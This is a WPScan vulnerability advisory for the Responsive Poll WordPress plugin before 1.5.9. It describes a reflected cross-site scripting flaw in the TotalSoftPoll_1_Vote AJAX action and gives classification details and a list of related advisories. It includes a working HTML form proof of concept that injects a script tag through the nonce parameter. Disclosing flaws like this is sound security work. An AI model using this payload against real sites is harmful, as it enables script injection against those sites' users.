Responsive Poll < 1.5.9 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The TotalSoftPoll_1_Vote AJAX action (available to both unauthenticated and unauthenticated users) outputs the invalid nonce without escaping it first, leading to a Reflected Cross-Site Scripting issue.

The issue was fixed in 1.5.5, however additional sanitisation and escaping was done in 1.5.5 to 1.5.9

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="TotalSoftPoll_1_Vote" />
      <input type="hidden" name="nonce" value="<script>alert(/XSS/)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.5.9

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

d209b611-2e2c-4464-a9af-7c2fb87411f8

Timeline

Publicly Published

2021-08-25 (about 4 years ago)

Added

2021-08-25 (about 4 years ago)

Last Updated

2021-08-25 (about 4 years ago)

Other

Published

Title

Published

2023-03-21

Title

Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard < 2.11.1 - Reflected Cross-Site Scripting

Published

2006-09-17

Title

Subscribe to Comments < 2.0.8 - Reflected XSS

Published

2023-01-23

Title

Lightweight Accordion < 1.5.15 - Contributor+ Stored XSS

Published

2021-12-24

Title

Spreadsheet Integration < 3.6.0 - Reflected Cross-Site Scripting

Published

2025-03-01

Title

WP Posts Carousel < 1.3.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via auto_play_timeout Parameter